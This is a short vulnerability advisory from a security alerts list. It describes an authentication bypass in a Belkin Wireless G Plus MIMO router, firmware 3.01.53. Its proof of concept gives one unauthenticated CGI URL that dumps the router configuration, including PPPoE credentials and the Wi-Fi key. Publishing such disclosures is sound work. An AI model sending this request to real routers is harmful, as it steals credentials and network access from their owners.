[NEWS] Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication Bypass Vulnerability

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication Bypass
Vulnerability

SUMMARY

A vulnerability in Belkin Wireless G Plus MIMO Router allows remote
attackers to access one of the router's CGI scripts and gather all the
sensitive information related to the router, such as the PPP username and
password, administrative username and password, WAP keys, etc all this
without being required to pass any sort of authentication credentials.

DETAILS

Vulnerable Systems:
* Belkin Wireless G Plus MIMO Router F5D9230-4 version 3.01.53

Proof of Concept:
For example we can get the configuration file here:
http://<ROUTER_IP>/SaveCfgFile.cgi

pppoe_username=...
pppoe_password=...
wl0_pskkey=...